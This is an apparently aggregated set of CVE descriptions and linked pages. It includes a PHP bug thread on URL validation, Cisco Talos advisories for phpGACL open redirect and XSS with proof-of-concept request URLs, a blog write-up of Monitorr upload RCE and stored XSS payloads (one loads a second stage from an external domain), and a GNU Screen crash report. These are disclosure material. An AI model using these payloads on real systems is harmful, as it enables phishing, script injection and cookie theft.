In PHP versions 7.3.x below 7.3.26, 7.4.x below 7.4.14 and 8.0.0, when validating URL with functions like filter_var($url, FILTER_VALIDATE_URL), PHP will accept an URL with invalid password as valid URL. This may lead to functions that rely on URL being valid to mis-parse the URL and produce wrong data as components of the URL.

Sec Bug #77423

FILTER\_VALIDATE\_URL accepts URLs with invalid userinfo

Submitted:

2019-01-07 10:16 UTC

Modified:

2021-02-15 10:28 UTC

From:

jifan dot jf at alibaba-inc dot com

Assigned:

stas (profile)

Status:

Closed

Package:

\*URL Functions

PHP Version:

5.6.39

OS:

linux

Private report:

No

CVE-ID:

2020-7071

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2020-02-13 14:37 UTC\] cmb@php.net**

\-Status: Open +Status: Duplicate

 **\[2020-02-13 14:44 UTC\] cmb@php.net**

\-Status: Duplicate +Status: Open

 **\[2020-02-13 16:06 UTC\] cmb@php.net**

\-Assigned To: +Assigned To: stas

 **\[2020-02-13 16:06 UTC\] cmb@php.net**

Given that the documentation of parse\_url()\[1\] states

| This function is not meant to validate the given URL, it only
| breaks it up into the above listed parts. Partial URLs are also
| accepted, parse\_url() tries its best to parse them correctly.

I don't think this qualifies as security issue.  However, given
that filter\_var($a, FILTER\_VALIDATE\_URL) returns the URL (instead
of false), I think there is a security issue in php\_url\_parse\_ex().

A possible fix would be recognize the userinfo only if it is valid
according to RFC 3986\[2\], which could look like
<https://gist.github.com/cmb69/180b63eea1c5163cb29440421007ba4a\>
(this has been developed against PHP-7.4).

Stas, what do you think about this?

\[1\] <https://www.php.net/parse-url\>
\[2\] <https://tools.ietf.org/html/rfc3986#appendix-A\>

 **\[2020-05-11 20:44 UTC\] stas@php.net**

\-Summary: parse\_url() will deliver a wrong host to user +Summary: FILTER\_VALIDATE\_URL accepts URLs with invalid userinfo

 **\[2020-05-11 20:44 UTC\] stas@php.net**

I think if userinfo is invalid FILTER\_VALIDATE\_URL definitely should not accept it.

 **\[2020-05-11 20:45 UTC\] stas@php.net**

We'd probably need a fix for this from 7.1 up.

 **\[2020-05-11 20:47 UTC\] stas@php.net**

Oops, I meant 7.2 of course not 7.1

 **\[2021-01-03 01:48 UTC\] stas@php.net**

\-CVE-ID: +CVE-ID: 2020-7071

 **\[2021-01-04 09:14 UTC\] stas@php.net**

\-Status: Assigned +Status: Closed

 **\[2021-01-27 07:52 UTC\] gkamathe at redhat dot com**

Hello,

Have we considered a case where the input has only "@" within the URL instead of "\\@". A sample use case is below on latest version of PHP, where the hostname being returned is still incorrect (malicious).



$ php -v
PHP 7.4.14 (cli) (built: Jan  5 2021 10:45:06) ( NTS )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
    with Zend OPcache v7.4.14, Copyright (c), by Zend Technologies
$ 
$ rpm -qa | grep -i php-7
php-7.4.14-1.fc33.x86\_64
$ 
$ cat test.php 
<?php
	#$a = "http://php.net\\@aliyun.com/aaa.do";
	$a = "http://php.net@aliyun.com/aaa.do";
	var\_dump($a);
	$b = parse\_url($a);
	var\_dump($b);
?>
$ 
$ php -f test.php 
string(32) "http://php.net@aliyun.com/aaa.do"
array(4) {
  \["scheme"\]=>
  string(4) "http"
  \["host"\]=>
  string(10) "aliyun.com"     <<<<<<<<
  \["user"\]=>
  string(7) "php.net"
  \["path"\]=>
  string(7) "/aaa.do"
}
$

 **\[2021-01-27 08:05 UTC\] stas@php.net**

The hostname returned in this case is correct. Also, please don't comment on the issues' page about different issues, it makes it very hard to track things.

 **\[2021-02-01 17:25 UTC\] ryan at association dot drupal dot org**

Was this intended to be merged into the 7.2 branch? I thought that was out of support now?

 **\[2021-02-15 09:29 UTC\] tomasnorre at gmail dot com**

It looks like there is a regression regarding this fix.

https://3v4l.org/hGkQj

The fix is in: 7.3.26, 7.4.14 and 8.0.1 as wanted, but it's gone again in: 7.3.27, 7.4.15 and 8.0.2

 **\[2021-02-15 10:28 UTC\] stas@php.net**

The change to parse\_url was intentionally reversed. The change in filter\_url still there.

 **\[2021-02-15 10:31 UTC\] tomasnorre at gmail dot com**

Thanks for the info.

CVE-2020-7071: FILTER_VALIDATE_URL accepts URLs with invalid userinfo

An open redirect vulnerability exists in the return_page redirection functionality of phpGACL 3.3.7, OpenEMR 5.0.2 and OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce). A specially crafted HTTP request can redirect users to an arbitrary URL. An attacker can provide a crafted URL to trigger this vulnerability.

**Summary**

An open redirect vulnerability exists in the return\_page redirection functionality of phpGACL 3.3.7. A specially crafted HTTP request can redirect users to an arbitrary URL. An attacker can provide a crafted URL to trigger this vulnerability.

**Tested Versions**

OpenEMR 5.0.2  
OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce)  
phpGACL 3.3.7

**Product URLs**

http://phpgacl.sourceforge.net/

**CVSSv3 Score**

6.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

**CWE**

CWE-601 - URL Redirection to Untrusted Site (‘Open Redirect’)

**Details**

phpGACL is a PHP library that allows developers to implement permission systems via a Generic Access Control List.

The latest version of this library has been found to be used in OpenEMR, as such the tests have been performed against an OpenEMR instance.

The file gacl_admin_api.class.php (in OpenEMR this has been renamed to Gacl/GaclAdminApi.php) defines a return_page function that is supposed to be used to redirect an admin user to a specified page:

    function return_page($url="") {
        global $_SERVER, $debug;
    
        if (empty($url) AND !empty($_SERVER[HTTP_REFERER])) {
            $this->debug_text("return_page(): URL not set, using referer!");
            $url = $_SERVER[HTTP_REFERER];
        }
    
        if (!$debug OR $debug==0) {
            header("Location: $url\n\n");             [1]
        } else {
            $this->debug_text("return_page(): URL: $url -- Referer: $_SERVER[HTTP_REFERRER]");
        }
    }
    

At \[1\] we can see that the $url passed as argument is used in the location header without any sanitization.

As an example, one instance where this function is used is in admin/acl_list.php:

    ...
    switch ($_GET['action']) {
        case 'Delete':
            $gacl_api->debug_text('Delete!');
    
            if (is_array ($_GET['delete_acl']) AND !empty($_GET['delete_acl'])) {
                foreach($_GET['delete_acl'] as $id) {
                    $gacl_api->del_acl($id);
                }
            }
    
            //Return page.
            $gacl_api->return_page($_GET['return_page']);   [2]
            break;
    ...
    

The return_page variable is controllable the query string \[2\], meaning that an attacker could supply a malicious link to the phpGACL instance, which eventually will redirect the user to an arbitrary location controlled by the attacker. This can be abused to conduct phishing attacks and steal credentials.

Additionally, the return_page function should either call exit() or die() before returning, otherwise execution would continue, which could result in unexpected behavior.

**Exploit Proof of Concept**

The issue above has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL.

An attacker could send the following link to an admin user to reproduce:

    http://open-erm.dev/gacl/admin/acl_list.php?action=Delete&return_page=http://open-emr.org&site=default
    

Clicking on this link will redirect the user to an arbitrary page (in this example “http://open-emr.org”).

**Timeline**

2020-10-21 - Vendor Disclosure  
2021-01-05 - Vendor Patched  
2021-01-27 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2020-13565: TALOS-2020-1178 || Cisco Talos Intelligence Group

xterm before Patch #366 allows remote attackers to execute arbitrary code or cause a denial of service (segmentation fault) via a crafted UTF-8 combining character sequence.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2021-27135: security - Re: screen crash processing combining characters

Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload.

Well, we pwned one more piece of software. Who cares? Nah, nobody. Alright, now user “nobody” – see how we did that.

Monitorr 1.7.6:

1.  Was written on PHP, that is a good sign for us attackers.
2.  Has 366 stars on Github.
3.  Designed to do monitoring. We like this kind of software.

**Auth Bypass**

Classical situation – an attacker can access installation panel after the actual installation.

Monitorr/assets/config/\_installation/\_register.php

Create a new user and authorize on behalf of this user.

**Remote Code Execution**

The vulnerable code resides in “upload.php” file. The only check that is done on the uploaded file is getimagesize() function:

This function can be easily bypassed by prepending standard image properties to an executable file. In this example, a payload mimics a GIF image:

After size check is passed, the file is successfully uploaded:

So we can see our PHP code executed:

It’s important to emphasize that no authentication checks are done in the upload.php script.

**Cross-Site Scripting (XSS)**

Two stored XSS have been found on service configuration tab at Monitorr settings page. Despite the length restriction, a malicious actor still can experience a full-feautered XSS attack by loading the second-stage payload from an external short domain like 14.rs .

Form field

Payload

Service URL

“><payload><a href="

Service Title

<embed src=//14.rs>

Service Image

“onerror=”alert(document.location)

Steps to Reproduce  
1\. Log in the application  
2\. Navigate to Service configuration tab  
3\. Enter the payload  
4\. Save changes and observe the javascript alert box triggered at the main Monitorr page.

By the way, session cookies don’t have HttpOnly flag, so we can steal authorization cookies.

**Fix**

Unfortunately, the Monitorr command decided to do not to fix these vulnerabilities. To do not have the same issues – ensure, that your software:

1.  Deletes the installation files right after the installation.
2.  Does input sanitization and output encoding of user input.
3.  Checks file uploads properly.

_LL advises to all the researchers do not break real applications_ _illegally. This fun leads to broken businesses and lives, and, most likely, will not make an attacker really rich._

CVE-2020-28871: Authorization Bypass and Remote Code Execution in Monitorr 1.7.6 – Lyhins' Lab

encoding.c in GNU Screen through 4.8.0 allows remote attackers to cause a denial of service (invalid write access and application crash) or possibly have unspecified other impact via a crafted UTF-8 character sequence.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 9 Feb 2021 16:06:07 -0000 (UTC)
From: Tavis Ormandy <taviso@...il.com>
To: oss-security@...ts.openwall.com
Subject: screen crash processing combining characters

Hello, I noticed someone posted this to the screen-devel list. I can
reproduce it here, just catting the testcase does crash my screen
session.

https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html

(I think it wasn't supposed to be public, but it is, so better it's
visible to security teams)

It looks like it might be exploitable at first glance, I see a crash
here in encoding.c, because i is out of range.

1411   else if (!combchars\[i\])
1412     {
1413       combchars\[i\] = (struct combchar \*)malloc(sizeof(struct combchar));
1414       if (!combchars\[i\])
1415            return;
1416       combchars\[i\]->prev = i;
1417       combchars\[i\]->next = i;
1418     }

Exploitable or not, it would be annoying if someone stuffed this into logfiles
being tailed, or whatever.

Tavis.

-- 
 \_o)            $ lynx lock.cmpxchg8b.com
 /\\\\  \_o)  \_o)  $ finger taviso@....org
\_\\\_V \_( ) \_( )  @taviso

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2021-26937: security - screen crash processing combining characters

A stack-based buffer overflow in dnsproxy in ConnMan before 1.39 could be used by network adjacent attackers to execute code.

CVE-2021-26675: security - Remote code execution in connman

gdhcp in ConnMan before 1.39 could be used by network-adjacent attackers to leak sensitive stack information, allowing further exploitation of bugs in gdhcp.

CVE-2021-26676: security - Remote code execution in connman

emlog v5.3.1 has full path disclosure vulnerability in t/index.php, which allows an attacker to see the path to the webroot/file.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2021-3293: emlog/emlog

In Wind River VxWorks, memory allocator has a possible overflow in calculating the memory block's size to be allocated by calloc(). As a result, the actual memory allocated is smaller than the buffer size specified by the arguments, leading to memory corruption.

In Wind River VxWorks, memory allocator has a possible overflow in calculating the memory block\\'s size to be allocated by calloc(). As a result, the actual memory allocated is smaller than the buffer size specified by the arguments, leading to memory corruption.

**Priority:** HIGH

**CVSS v3:** 7.3

**Component:** It doesn\\'t impact WRLinux.

**Publish Date:** Feb 3, 2021

**Related ID:** \--

**CVSS v2:** CRITICAL

**Modified Date:** Feb 5, 2021

Find out more about CVE-2020-28895 from the MITRE-CVE dictionary and NIST NVD

Login may be required to access defects or downloads.

Product Name

Status

Defect

Fixed

Downloads

**Linux**

Wind River Linux LTS 17

Not Vulnerable

\--

\--

\--

Wind River Linux 8

Not Vulnerable

\--

\--

\--

Wind River Linux 9

Not Vulnerable

\--

\--

\--

Wind River Linux 7

Not Vulnerable

\--

\--

\--

Wind River Linux LTS 21

Not Vulnerable

\--

\--

\--

Wind River Linux LTS 18

Not Vulnerable

\--

\--

\--

Wind River Linux LTS 19

Not Vulnerable

\--

\--

\--

Wind River Linux CD release

Not Vulnerable

\--

\--

\--

**VxWorks**

VxWorks 7

Fixed

V7LIBC-1327  

21.03

\--

VxWorks 6.9

Fixed

V7LIBC-1327  

6.9.4.12 RCPL3

\--

Product Name

Status

Defect

Fixed

Downloads

**Notes**  
Requires LTSS - customers must have active LTSS (Long Term Security Shield) Support to receive up-to-date information about vulnerabilities that may affect legacy software. Please contact your Wind River account team or see https://docs.windriver.com/bundle/Support\_and\_Maintenance\_Supplemental\_Terms\_and\_Conditions and https://support2.windriver.com/index.php?page=plc for more information.

CVE-2020-28895: Wind River

A cross-site scripting vulnerability exists in the template functionality of phpGACL 3.3.7. A specially crafted HTTP request can lead to arbitrary JavaScript execution. An attacker can provide a crafted URL to trigger this vulnaerability in the phpGACL template action parameter.

**Summary**

Multiple cross-site scripting vulnerabilities exist in the template functionality of phpGACL 3.3.7. A specially crafted HTTP request can lead to arbitrary JavaScript execution. An attacker can provide a crafted URL to trigger this vulnerability.

**Tested Versions**

phpGACL 3.3.7  
OpenEMR 5.0.2  
OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce)

**Product URLs**

http://phpgacl.sourceforge.net/

**CVSSv3 Score**

9.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**CWE**

CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

**Details**

phpGACL is a PHP library that allows developers to implement permission systems via a Generic Access Control List.

The latest version of this library has been found to be used in OpenEMR, as such the tests have been performed against an OpenEMR instance.

Across the whole codebase of phpGACL smarty is used for templating, however multiple variables are not escaped correctly when rendered, leading to cross-site scripting (XSS).

The following is an (incomplete) list of code paths that lead to XSS, caused by missing escape of the input parameters that can be injected by an attacker via GET or POST request. Note that other similar XSS code paths exist under the same gacl/ subdirectory.

**CVE-2020-13562 - phpGACL template action parameter cross-site scripting vulnerabiliy**

In admin/acl_admin.php, the GET parameter action leads to an XSS:

    ...
    if (isset($_GET['action'])) {
            $smarty->assign('action', $_GET['action']);    [1]
    }
    
    $smarty->assign('current','acl_admin');
    $smarty->assign('page_title', 'ACL Admin');
    
    $smarty->assign('phpgacl_version', $gacl_api->get_version() );
    $smarty->assign('phpgacl_schema_version', $gacl_api->get_schema_version() );
    $smarty->display('phpgacl/acl_admin.tpl');             [2]
    ?>
    

At \[1\] the action is fetched from the query string, and passed to smarty. The template used for rendering is phpgacl/acl_admin.tpl \[2\]:

    ...
    [ <a href="group_admin.php?group_type=aro&return_page={$SCRIPT_NAME}?action={$action}&acl_id={$acl_id}">Edit</a> ]
    ...
    

The line above is executed twice in the template, which renders the action argument verbatim, leading to an XSS.

**Exploit Proof of Concept**

This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL.  
The following request exploits the XSS in acl_admin.php, via the action argument:

    http://openemr.dev/gacl/admin/acl_admin.php?action=\"><script>alert(1)</script>
    

**CVE-2020-13563 - phpGACL template group\_id parameter cross-site scripting vulnerabiliy**

In admin/assign_group.php, the GET parameter group_id leads to an XSS when an invalid or no action is specified via POST:

    ...
    //Get group name.
    $group_data = $gacl_api->get_group_data($_GET['group_id'], $group_type);
    $smarty->assign('group_name', $group_data[2]);
    
    $smarty->assign('group_id', $_GET['group_id']);                              [1]
    ...
    $smarty->assign('group_type', $group_type);
    $smarty->assign('object_type', $object_type);
    $smarty->assign('return_page', $_SERVER['REQUEST_URI'] );
    
    $smarty->assign('current','assign_group_'. $group_type);
    $smarty->assign('page_title', 'Assign Group - '. strtoupper($group_type));
    
    $smarty->assign('phpgacl_version', $gacl_api->get_version() );
    $smarty->assign('phpgacl_schema_version', $gacl_api->get_schema_version() );
    
    $smarty->display('phpgacl/assign_group.tpl');                                [2]
    ?>
    

At \[1\] the group_id is fetched from the query string, and passed to smarty. The template used for rendering is phpgacl/assign_group.tpl \[2\]:

    ...
            {include file="phpgacl/pager.tpl" pager_data=$paging_data link="?group_type=$group_type&group_id=$group_id&"}   [3]
              </td>
            </tr>
            <tr>
            ...
    </table>
    <input type="hidden" name="group_id" value="{$group_id}">   [4]
    

At \[4\] the group_id is rendered verbatim, leading to an XSS. The group_id is also passed to template pager.tpl via the “link” parameter \[3\], leading to another XSS:

    ...
          <a href="{$link}page=1">|&lt;</a> <a href="{$link}page={$paging_data.prevpage|escape:'html'}">&lt;&lt;</a>
    ...
          <a href="{$link}page={$paging_data.nextpage|escape:'html'}">&gt;&gt;</a> <a href="{$link}page={$paging_data.lastpageno|escape:'html'}">&gt;|</a>
    

**Exploit Proof of Concept**

This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL.  
The following request exploits the XSS in assign_group.php, via the group_id argument:

    http://openemr.dev/gacl/admin/assign_group.php?group_id="><script>alert(1)</script>
    

**CVE-2020-13564 - phpGACL template acl\_id parameter cross-site scripting vulnerabiliy**

In admin/acl_admin.php, the GET parameter acl_id leads to an XSS when an invalid or no action is specified via POST:

    ...
            if (isset($_GET['acl_id'])) {
                $smarty->assign('acl_id', $_GET['acl_id'] );                      [1]
            }
    
            break;
    }
    
    //$smarty->assign('return_page', urlencode($_SERVER[REQUEST_URI]) );
    if (isset($_GET['return_page'])) {
        $smarty->assign('return_page', $_GET['return_page']);
    }
    if (isset($_GET['action'])) {
        $smarty->assign('action', $_GET['action']);
    }
    
    $smarty->assign('current','acl_admin');
    $smarty->assign('page_title', 'ACL Admin');
    
    $smarty->assign('phpgacl_version', $gacl_api->get_version() );
    $smarty->assign('phpgacl_schema_version', $gacl_api->get_schema_version() );
    $smarty->display('phpgacl/acl_admin.tpl');                                     [2]
    ?>
    

At \[1\] the acl_id is fetched from the query string, and passed to smarty. The template used for rendering is phpgacl/acl_admin.tpl \[2\]:

    ...
    [ <a href="group_admin.php?group_type=aro&return_page={$SCRIPT_NAME}?action={$action}&acl_id={$acl_id}">Edit</a> ]
    ...
    [ <a href="group_admin.php?group_type=axo&return_page={$SCRIPT_NAME}?action={$action}&acl_id={$acl_id}">Edit</a> ]
    ...
    <input type="hidden" name="acl_id" value="{$acl_id}">
    ...
    

In three different spots in the template, the acl_id argument is rendered verbatim, leading to an XSS.

**Exploit Proof of Concept**

This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL.  
The following request exploits the XSS in acl_admin.php, via the acl_id argument:

    http://openemr.dev/gacl/admin/acl_admin.php?acl_id="><script>alert(1)</script>
    

**Timeline**

2020-10-23 - Vendor Disclosure

2021-01-05 - Vendor Patched  
2021-01-27 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

Tag

#php